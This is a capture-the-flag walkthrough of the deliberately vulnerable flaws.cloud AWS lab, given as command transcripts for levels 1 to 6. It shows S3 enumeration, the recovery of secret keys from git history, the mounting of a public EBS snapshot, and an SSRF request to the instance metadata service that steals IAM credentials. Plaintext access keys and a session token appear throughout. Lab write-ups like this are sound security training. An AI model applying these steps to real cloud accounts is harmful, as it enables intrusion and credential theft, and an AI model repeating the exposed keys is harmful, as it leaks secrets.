flaws.cloud

Level 1

DNS enum:

$ dig +nocmd flaws.cloud
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 46135
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;flaws.cloud.            IN    A

;; ANSWER SECTION:
flaws.cloud.        5    IN    A    52.218.176.234

;; Query time: 64 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Sat Aug 28 16:30:43 +0630 2021
;; MSG SIZE  rcvd: 56

$ nslookup 52.218.176.234
234.176.218.52.in-addr.arpa    name = s3-website-us-west-2.amazonaws.com.

Authoritative answers can be found from:

Request s3:

aws s3 ls  s3://flaws.cloud/ --no-sign-request --region us-west-2
2017-03-14 09:30:38       2575 hint1.html
2017-03-03 10:35:17       1707 hint2.html
2017-03-03 10:35:11       1101 hint3.html
2020-05-23 00:46:45       3162 index.html
2018-07-10 23:17:16      15979 logo.png
2017-02-27 08:29:28         46 robots.txt
2017-02-27 08:29:30       1051 secret-dd02c7c.html

Level 2:

http://flaws.cloud/secret-dd02c7c.html
# http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

Level 2

Link - http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

Create simple user and you will get access key id and access key.

https://console.aws.amazon.com/iam/home#/users$new?step=final&accessKey&userNames=test123

This is my Access key id and key. I copy that.

AKIAUFZUUPCWBRVSKK5L
hePWL07ve1b12e6LNS1iva4nMWJbVzp/qWnrROyo

When i access s3 bucket. I get permission error.

% aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied

Create a profile with id and key.

% aws configure --profile liv-test
AWS Access Key ID [None]: AKIAUFZUUPCWBRVSKK5L
AWS Secret Access Key [None]: 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
Default region name [None]:
Default output format [None]:

% aws configure list --profile liv-test
      Name                    Value             Type    Location
      ----                    -----             ----    --------
   profile                 liv-test           manual    --profile
access_key     ****************KK5L shared-credentials-file    
secret_key     ****************ROyo shared-credentials-file    
    region                <not set>             None    None

Don't forget to create group and add user to this group. Now you can request s3 with this profile.

% aws s3 --profile liv-test ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud    
2017-02-27 08:32:15      80751 everyone.png
2017-03-03 10:17:17       1433 hint1.html
2017-02-27 08:34:39       1035 hint2.html
2017-02-27 08:32:14       2786 index.html
2017-02-27 08:32:14         26 robots.txt
2017-02-27 08:32:15       1051 secret-e4443fc.html

You will get level 3 link.

http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html
# http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

Level 3

Link - http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

First request s3 bucket.

% aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ --no-sign-request
                           PRE .git/
2017-02-27 06:44:33     123637 authenticated_users.png
2017-02-27 06:44:34       1552 hint1.html
2017-02-27 06:44:34       1426 hint2.html
2017-02-27 06:44:35       1247 hint3.html
2017-02-27 06:44:33       1035 hint4.html
2020-05-23 00:51:10       1861 index.html
2017-02-27 06:44:33         26 robots.txt

Download all this files.

aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request

You will see .git directory and commit history.

% git log
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -> master)
Author: 0xdabbad00 <scott@summitroute.com>
Date:   Sun Sep 17 09:10:43 2017 -0600

    Oops, accidentally added something I shouldn't have

commit f52ec03b227ea6094b04e43f475fb0126edb5a61
Author: 0xdabbad00 <scott@summitroute.com>
Date:   Sun Sep 17 09:10:07 2017 -0600

    first commit
(END)

View first commit history. You will see access id and key.

% git show b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -> master)
Author: 0xdabbad00 <scott@summitroute.com>
Date:   Sun Sep 17 09:10:43 2017 -0600

    Oops, accidentally added something I shouldn't have

diff --git a/access_keys.txt b/access_keys.txt
deleted file mode 100644
index e3ae6dd..0000000
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAJ366LIPB4IJKT7SA
-secret_access_key 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

Create a profile with this key.

% aws configure --profile level3
AWS Access Key ID [None]: AKIAJ366LIPB4IJKT7SA
AWS Secret Access Key [None]: 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
Default region name [None]: 
Default output format [None]: 

% aws s3 --profile level3 ls
2017-02-13 04:01:07 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
2017-05-29 23:04:53 config-bucket-975426262029
2017-02-13 02:33:24 flaws-logs
2017-02-05 10:10:07 flaws.cloud
2017-02-24 08:24:13 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
2017-02-27 00:45:44 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
2017-02-27 00:46:06 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
2017-02-27 02:14:51 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
2017-02-27 02:17:58 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
2017-02-27 02:36:32 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud

Level 4

Link - http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud

Get id by using level3 key.

% aws --profile level3 sts get-caller-identity
{
    "UserId": "AIDAJQ3H5DC3LEG2BKSLC",
    "Account": "975426262029",
    "Arn": "arn:aws:iam::975426262029:user/backup"
}

View all snapshots.

% aws --profile level3 ec2 describe-snapshots --owner-id 975426262029
You must specify a region. You can also configure your region by running "aws configure".

No problem. We know that region from level1.

% aws --profile level3 ec2 describe-snapshots --owner-id 975426262029 --region us-west-2
{
    "Snapshots": [
        {
            "Description": "",
            "Encrypted": false,
            "OwnerId": "975426262029",
            "Progress": "100%",
            "SnapshotId": "snap-0b49342abd1bdcb89",
            "StartTime": "2017-02-28T01:35:12.000Z",
            "State": "completed",
            "VolumeId": "vol-04f1c039bc13ea950",
            "VolumeSize": 8,
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "flaws backup 2017.02.27"
                }
            ]
        }
    ]
}

Check the permission of snapshot.

% aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile level3 --region us-west-2
{
    "CreateVolumePermissions": [
        {
            "Group": "all"
        }
    ],
    "SnapshotId": "snap-0b49342abd1bdcb89"
}

Create volume with this snapshot.

% aws ec2 --profile liv-test create-volume --region us-west-2 --availability-zone us-west-2a --snapshot-id snap-0b49342abd1bdcb89
{
    "AvailabilityZone": "us-west-2a",
    "CreateTime": "2021-08-28T21:45:27.000Z",
    "Encrypted": false,
    "Size": 8,
    "SnapshotId": "snap-0b49342abd1bdcb89",
    "State": "creating",
    "VolumeId": "vol-0e621fe2ba72e7433",
    "Iops": 100,
    "Tags": [],
    "VolumeType": "gp2",
    "MultiAttachEnabled": false
}

View Public ip.

% aws ec2 describe-instances  --query "Reservations[*].Instances[*].PublicIpAddress" --output=text --profile level3 --region us-west-2
35.165.182.7

Create EC2. In volume tap search snapshots with 0b49342abd1bdcb89 and /dev/sdf. Login to the ec2 instance using ssh key.

% mv ~/Downloads/hnl.pem .
% chmod 600 hnl.pem 
% ssh -i hnl.pem ubuntu@34.211.97.131
The authenticity of host '34.211.97.131 (34.211.97.131)' can't be established.
ECDSA key fingerprint is SHA256:pETgClWtWrlnIsvDIJxzbDKkGXClHY7FCjaXjJN084A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '34.211.97.131' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-1045-aws x86_64)

List all block devices. We know that snapshots is mount in xvdf.

ubuntu@ip-172-31-60-33:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
loop0     7:0    0 33.3M  1 loop /snap/amazon-ssm-agent/3552
loop1     7:1    0 55.5M  1 loop /snap/core18/1997
loop2     7:2    0 70.4M  1 loop /snap/lxd/19647
loop3     7:3    0 32.3M  1 loop /snap/snapd/11588
xvda    202:0    0    8G  0 disk 
└─xvda1 202:1    0    8G  0 part /
xvdf    202:80   0    8G  0 disk 
└─xvdf1 202:81   0    8G  0 part 

ubuntu@ip-172-31-60-33:~$ sudo -i
root@ip-172-31-60-33:~# sudo mkdir /mnt/flaws
root@ip-172-31-60-33:~# sudo mount /dev/xvdf1 /mnt/flaws

oot@ip-172-31-60-33:~# cd /mnt/flaws
root@ip-172-31-60-33:/mnt/flaws# ls
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  srv  tmp  var      vmlinuz.old
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   snap  sys  usr  vmlinuz
root@ip-172-31-60-33:/mnt/flaws# cat etc/nginx/.htpasswd 
flaws:$apr1$4ed/7TEL$cJnixIRA6P4H8JDvKVMku0

root@ip-172-31-60-33:/mnt/flaws# cd home/ubuntu/
root@ip-172-31-60-33:/mnt/flaws/home/ubuntu# ls
meta-data  setupNginx.sh
root@ip-172-31-60-33:/mnt/flaws/home/ubuntu# cat setupNginx.sh 
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

You will get the level5 link.

http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

Level 5

Link - http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

Request via 169.254.169.254

% curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
{
  "Code" : "Success",
  "LastUpdated" : "2021-08-29T02:41:10Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA6GG7PSQGT456HE65",
  "SecretAccessKey" : "SYGydiwEug0lTorDP5PHq9ZsUcxcsB3uARhJHs7B",
  "Token" : "IQoJb3JpZ2luX2VjEGMaCXVzLXdlc3QtMiJHMEUCIQDK+WToeB+NGzdOY17DSv8O4F8n3eOHxJW/plep2Z0FCgIgCvPCnthTloGfwWgJctQSvAwv6DiMPnRb11Rb8vsRgggqgwQInP//////////ARACGgw5NzU0MjYyNjIwMjkiDJ1HIH85ZrK+CC1ccCrXA/Ilw0avQMFN7XvGtN7Nfaiktvvh/QD0T4Qd1g+VUVtv7ewN9ibPaOKehprcDPIDkrbtKWWT9kgtVZnD7OppLpN4/2vMm5gm8GsmHTCqsPw4xUgNX89oZsZ1sLDC74Kn/Cvo152w9YJybJr/A7xwgIGqyLk7J9ookpS4vqNeFDoDo/IFHarZrbwSRBDbOM9848EMDnAshXYM5IwKOfM8fB1brzQimuwHl0qepujIxBt3nVZiEsg4Aq+beFp3DzYU4AaMScLQVNjJIaG7pscQg7ZvTgvXodSRGBv4+W98bV7/Ais7kWSrXsQC0VIzop31HDU0/icy/QD5pe13vkB8CQK2YqKOiUDW/jOhS0pGbHFI3fN0YQIZXgfGaHLHO4Wz4l6YQiI6oa24xI4ZTwpvFcDjrydPqhrla0l/laeexHKoVDkecFUlwq6pQb/IaH1Kn1cI3hgW0PwY+vn28xq6gCXcX0uGvzX9H8EL8NrzUbecy9SNRLIIsTjshU03Y0eDtjVeCL1hvBhZnfysfrTaGNSwYb+jYyGA43LjZDz9AxMVwQHk78PDILkgu3j27p2YZdDSRwrLN52vuw8RcVZLtLPC8wMvLZVNfszN87VeaFbL5WYwEmiZfDDe56uJBjqlAUerBhoKg4ebyAG4fRrG6mGxMVGVHLyV8bcFW93oikrwjyLKYgqfx/raV30+GhLv5U+EmxP4NlaKYlIVf/NH2l1dpb/2cDpZHkq5Zfg/VeOgRr/GBbSiYm69nzODo3H9xr8IPNhJPmKk+KHmgHlPMjulx2yatGIiBEQCnQ/1q1osHm3Xp9WrhD3vwqS+wiOwpczE2jdS9mqxPFGUyKI1h5l22iZAMg==",
  "Expiration" : "2021-08-29T08:51:15Z"
}

Setup Credential in /.aws/credentials.

% cat ~/.aws/credentials 
[level5]
aws_access_key_id = ASIA6GG7PSQGT456HE65
aws_secret_access_key = SYGydiwEug0lTorDP5PHq9ZsUcxcsB3uARhJHs7B
aws_session_token = IQoJb3JpZ2luX2VjEGMaCXVzLXdlc3QtMiJHMEUCIQDK+WToeB+NGzdOY17DSv8O4F8n3eOHxJW/plep2Z0FCgIgCvPCnthTloGfwWgJctQSvAwv6DiMPnRb11Rb8vsRgggqgwQInP//////////ARACGgw5NzU0MjYyNjIwMjkiDJ1HIH85ZrK+CC1ccCrXA/Ilw0avQMFN7XvGtN7Nfaiktvvh/QD0T4Qd1g+VUVtv7ewN9ibPaOKehprcDPIDkrbtKWWT9kgtVZnD7OppLpN4/2vMm5gm8GsmHTCqsPw4xUgNX89oZsZ1sLDC74Kn/Cvo152w9YJybJr/A7xwgIGqyLk7J9ookpS4vqNeFDoDo/IFHarZrbwSRBDbOM9848EMDnAshXYM5IwKOfM8fB1brzQimuwHl0qepujIxBt3nVZiEsg4Aq+beFp3DzYU4AaMScLQVNjJIaG7pscQg7ZvTgvXodSRGBv4+W98bV7/Ais7kWSrXsQC0VIzop31HDU0/icy/QD5pe13vkB8CQK2YqKOiUDW/jOhS0pGbHFI3fN0YQIZXgfGaHLHO4Wz4l6YQiI6oa24xI4ZTwpvFcDjrydPqhrla0l/laeexHKoVDkecFUlwq6pQb/IaH1Kn1cI3hgW0PwY+vn28xq6gCXcX0uGvzX9H8EL8NrzUbecy9SNRLIIsTjshU03Y0eDtjVeCL1hvBhZnfysfrTaGNSwYb+jYyGA43LjZDz9AxMVwQHk78PDILkgu3j27p2YZdDSRwrLN52vuw8RcVZLtLPC8wMvLZVNfszN87VeaFbL5WYwEmiZfDDe56uJBjqlAUerBhoKg4ebyAG4fRrG6mGxMVGVHLyV8bcFW93oikrwjyLKYgqfx/raV30+GhLv5U+EmxP4NlaKYlIVf/NH2l1dpb/2cDpZHkq5Zfg/VeOgRr/GBbSiYm69nzODo3H9xr8IPNhJPmKk+KHmgHlPMjulx2yatGIiBEQCnQ/1q1osHm3Xp9WrhD3vwqS+wiOwpczE2jdS9mqxPFGUyKI1h5l22iZAMg==

% aws configure list --profile level5
      Name                    Value             Type    Location
      ----                    -----             ----    --------
   profile                   level5           manual    --profile
access_key     ****************HE65 shared-credentials-file    
secret_key     ****************Hs7B shared-credentials-file    
    region                <not set>             None    None

% aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud 
                           PRE ddcc78ff/
2017-02-27 08:41:07        871 index.html

Request s3 bucket:

% aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
                           PRE ddcc78ff/
2017-02-27 08:41:07        871 index.html

% aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/
2017-03-03 11:06:23       2463 hint1.html
2017-03-03 11:06:23       2080 hint2.html
2020-05-23 01:12:20       2924 index.html

Level 6

Access key ID: AKIAJFQ6E7BY57Q3OBGA Secret: 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

Configure credentials in /.aws/credentials

% cat ~/.aws/credentials
[level6]
aws_access_key_id = AKIAJFQ6E7BY57Q3OBGA
aws_secret_access_key = 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

Get iam-user info:

% aws --profile level6 iam get-user
{
    "User": {
        "Path": "/",
        "UserName": "Level6",
        "UserId": "AIDAIRMDOSCWGLCDWOG6A",
        "Arn": "arn:aws:iam::975426262029:user/Level6",
        "CreateDate": "2017-02-26T23:11:16Z"
    }
}

Get policies info (MySecurityAudit is default):

% aws --profile level6 iam list-attached-user-policies --user-name Level6
{
    "AttachedPolicies": [
        {
            "PolicyName": "list_apigateways",
            "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
        },
        {
            "PolicyName": "MySecurityAudit",
            "PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit"
        },
        {
            "PolicyName": "AWSCompromisedKeyQuarantine",
            "PolicyArn": "arn:aws:iam::aws:policy/AWSCompromisedKeyQuarantine"
        }
    ]
}

Get list_apigateways info (ARN Amazon Resource Name):

% aws --profile level6 iam get-policy  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
{
    "Policy": {
        "PolicyName": "list_apigateways",
        "PolicyId": "ANPAIRLWTQMGKCSPGTAIO",
        "Arn": "arn:aws:iam::975426262029:policy/list_apigateways",
        "Path": "/",
        "DefaultVersionId": "v4",
        "AttachmentCount": 1,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "Description": "List apigateways",
        "CreateDate": "2017-02-20T01:45:17Z",
        "UpdateDate": "2017-02-20T01:48:17Z"
    }
}

Get detail about version:

% aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4

{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Action": [
                        "apigateway:GET"
                    ],
                    "Effect": "Allow",
                    "Resource": "arn:aws:apigateway:us-west-2::/restapis/*"
                }
            ]
        },
        "VersionId": "v4",
        "IsDefaultVersion": true,
        "CreateDate": "2017-02-20T01:48:17Z"
    }
}

Get all lambda function:

% aws --region us-west-2 --profile level6 lambda list-functions
{
    "Functions": [
        {
            "FunctionName": "Level6",
            "FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
            "Runtime": "python2.7",
            "Role": "arn:aws:iam::975426262029:role/service-role/Level6",
            "Handler": "lambda_function.lambda_handler",
            "CodeSize": 282,
            "Description": "A starter AWS Lambda function.",
            "Timeout": 3,
            "MemorySize": 128,
            "LastModified": "2017-02-27T00:24:36.054+0000",
            "CodeSha256": "2iEjBytFbH91PXEMO5R/B9DqOgZ7OG/lqoBNZh5JyFw=",
            "Version": "$LATEST",
            "TracingConfig": {
                "Mode": "PassThrough"
            },
            "RevisionId": "98033dfd-defa-41a8-b820-1f20add9c77b",
            "PackageType": "Zip"
        }
    ]
}

% aws  --profile level6 --region us-west-2 lambda get-policy --function-name Level6
{
    "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}",
    "RevisionId": "98033dfd-defa-41a8-b820-1f20add9c77b"
}

s33ppypa75 is rest-api id.

% aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
{
    "item": [
        {
            "deploymentId": "8gppiv",
            "stageName": "Prod",
            "cacheClusterEnabled": false,
            "cacheClusterStatus": "NOT_AVAILABLE",
            "methodSettings": {},
            "tracingEnabled": false,
            "createdDate": 1488155168,
            "lastUpdatedDate": 1488155168
        }
    ]
}

Final Link

https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
# "Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"